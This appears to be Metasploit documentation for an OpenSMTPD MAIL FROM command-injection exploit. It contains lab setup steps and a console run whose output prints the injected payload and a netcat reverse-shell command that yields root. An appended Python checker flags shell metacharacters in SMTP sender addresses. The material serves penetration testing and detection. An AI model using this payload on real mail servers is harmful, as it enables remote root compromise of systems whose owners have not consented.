## Vulnerable Application

### Description

This module exploits a command injection in the `MAIL FROM` field during SMTP interaction with OpenSMTPD to execute code as the root user.

### Setup

1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
2. Install the system, noting the domain name (defaults to `foo.my.domain`)
3. Configure the following settings in `/etc/mail/smtpd.conf`:
   * `listen on all`
   * `match from any for domain "foo.my.domain" action "local_mail"`
4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
5. Execute `ifconfig` and look for an appropriate target IP

### Targets

```
Id  Name
--  ----
0   OpenSMTPD >= commit a8e222352f
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

**RCPT_TO**

Set this to a valid mail recipient. The default is `root`.

## Scenarios

### OpenSMTPD 6.6.0 on OpenBSD 6.6

```
msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing

Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 192.168.56.133
rhosts => 192.168.56.133
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.133:25 - Connecting to OpenSMTPD
[*] 192.168.56.133:25 - Saying hello and sending exploit
[*] 192.168.56.133:25 - Expecting: /220.*OpenSMTPD/
[+] 192.168.56.133:25 - Received: 220 foo.my.domain ESMTP OpenSMTPD
[*] 192.168.56.133:25 - Sending: HELO oKFMWnrTJZjTbzkGfVMsyDy7pO35ze
[*] 192.168.56.133:25 - Expecting: /250.*pleased to meet you/
[+] 192.168.56.133:25 - Received: 250 foo.my.domain Hello oKFMWnrTJZjTbzkGfVMsyDy7pO35ze [192.168.56.1], pleased to meet you
[*] 192.168.56.133:25 - Sending: MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;>
[*] 192.168.56.133:25 - Expecting: /250.*Ok/
[+] 192.168.56.133:25 - Received: 250 2.0.0 Ok
[*] 192.168.56.133:25 - Sending: RCPT TO:
[*] 192.168.56.133:25 - Expecting: /250.*Recipient ok/
[+] 192.168.56.133:25 - Received: 250 2.1.5 Destination address valid: Recipient ok
[*] 192.168.56.133:25 - Sending: DATA
[*] 192.168.56.133:25 - Expecting: /354 Enter mail.*itself/
[+] 192.168.56.133:25 - Received: 354 Enter mail, end with "." on a line by itself
[*] 192.168.56.133:25 - Sending: # # # # # # # # # # # # # # # mkfifo /tmp/eizzy; nc 192.168.56.1 4444 0/tmp/eizzy 2>&1; rm /tmp/eizzy
[*] 192.168.56.133:25 - Sending: .
[*] 192.168.56.133:25 - Expecting: /250.*Message accepted for delivery/
[+] 192.168.56.133:25 - Received: 250 2.0.0 ccd8e419 Message accepted for delivery
[*] 192.168.56.133:25 - Sending: QUIT
[*] 192.168.56.133:25 - Expecting: /221.*Bye/
[+] 192.168.56.133:25 - Received: 221 2.0.0 Bye
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:16126) at 2020-02-05 16:16:59 -0600

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.my.domain 6.6 GENERIC#353 amd64
```
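The session above shows the tell-tale shape of this bug from the defender's side: a `MAIL FROM` reverse-path that is not a mailbox at all but a string of shell commands separated by `;`. The following is an added example, not part of the module or of OpenSMTPD, that audits a list of SMTP client commands (a constructed sample modelled on the transcript, not a capture) and flags reverse-paths containing shell metacharacters or failing a deliberately conservative `local@domain` grammar. It is written as a log-review or mail-gateway check, useful for hunting for attempts in SMTP logs or as a front-end filter; the grammar is intentionally stricter than RFC 5321 and will reject some exotic but legitimate addresses.

```python
import re

# Constructed sample of SMTP client commands, modelled on the transcript above.
# This is a hypothetical excerpt, not data taken from the page.
SAMPLE_COMMANDS = [
    "HELO mail.example.test",
    "MAIL FROM:<alice@example.test>",
    "RCPT TO:<root>",
    "MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;>",
    "MAIL FROM:<>",
]

# Conservative reverse-path grammar: local-part@domain with a small character set.
# Stricter than RFC 5321 on purpose; the point is that every character that
# means something to /bin/sh is excluded, and a domain part is mandatory.
_REVERSE_PATH = re.compile(r"^[A-Za-z0-9._+=-]+@[A-Za-z0-9.-]+$")

# Characters with meaning to /bin/sh that never belong in a sender address.
SHELL_META = set(";|&`$(){}<>\n\r")


def parse_mail_from(command):
    """Return the reverse-path inside MAIL FROM:<...>, or None for other commands."""
    m = re.match(r"^MAIL FROM:\s*<(.*)>\s*$", command, re.IGNORECASE)
    return m.group(1) if m else None


def classify_reverse_path(path):
    """Classify a reverse-path as ('ok' | 'bounce' | 'suspect', reasons)."""
    if path == "":
        # An empty reverse-path is the normal form for bounce messages.
        return "bounce", []
    reasons = []
    meta = sorted(SHELL_META & set(path))
    if meta:
        reasons.append("shell metacharacters: " + "".join(meta))
    if not _REVERSE_PATH.match(path):
        reasons.append("not a conservative local@domain mailbox")
    return ("ok" if not reasons else "suspect"), reasons


def audit_commands(commands):
    """Return (command, verdict, reasons) for every MAIL FROM in the command list."""
    findings = []
    for cmd in commands:
        path = parse_mail_from(cmd)
        if path is None:
            continue  # only MAIL FROM carries the reverse-path
        verdict, reasons = classify_reverse_path(path)
        findings.append((cmd, verdict, reasons))
    return findings


if __name__ == "__main__":
    for cmd, verdict, reasons in audit_commands(SAMPLE_COMMANDS):
        print(f"{verdict:8} {cmd}")
        for r in reasons:
            print(f"         - {r}")
```

Running it prints one line per `MAIL FROM`, marking the injected reverse-path as `suspect` with both reasons, while the ordinary sender and the empty bounce path pass. A gateway that applied `classify_reverse_path` before handing the address to any command-executing delivery path would refuse exactly the input this module sends.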